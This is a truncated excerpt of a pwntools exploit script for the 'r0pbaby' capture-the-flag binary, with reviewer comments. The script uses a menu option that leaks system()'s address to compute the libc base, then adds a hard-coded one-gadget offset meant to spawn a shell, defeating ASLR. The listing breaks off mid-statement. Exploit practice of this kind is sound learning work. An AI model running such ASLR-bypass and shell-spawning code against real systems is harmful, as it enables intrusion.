pwn - r0pbaby
# Excerpt of a pwntools script run against the local "r0pbaby" binary.
# The page cuts the listing off in the middle of the last statement; that
# tail is kept exactly as published.
from pwn import *

context.log_level = "debug"  # most verbose pwntools log level

r = process("./r0pbaby")  # starts the binary as a local child process
e = ELF("./r0pbaby")
l = e.libc  # libc that pwntools resolves for this ELF on the local machine

# Hard-coded offsets that are later added to the libc base; only shell[0]
# is used in the visible part. NOTE(review): presumably valid for one
# specific libc build only; confirm against the libc actually loaded.
shell = [0x4f3d5, 0x4f432, 0x10a41c]
system_off = l.sym['system']  # offset of system() inside that libc file

# Answer two ": " prompts with "2" and then "system".
# NOTE(review): looks like a menu option that prints a symbol's address;
# the program's prompts are not shown on the page.
r.sendlineafter(": ", "2")
r.sendlineafter(": ", "system")
r.recvuntil(": ")
# Read 18 characters and parse them as hex (presumably "0x" + 16 digits).
leak = int(r.recv(18), 16)

# The value is treated as the runtime address of system(); subtracting the
# symbol's file offset yields the libc load base. A program that reports
# such an address to its user gives away the randomised base that ASLR is
# meant to keep secret.
libc_base = leak - system_off
one_shot = libc_base + shell[0]

log.info("leak = " + hex(leak))
# Listing is truncated on the page from here on.
log.info("libc_base = " + hex(l..
2021.02.05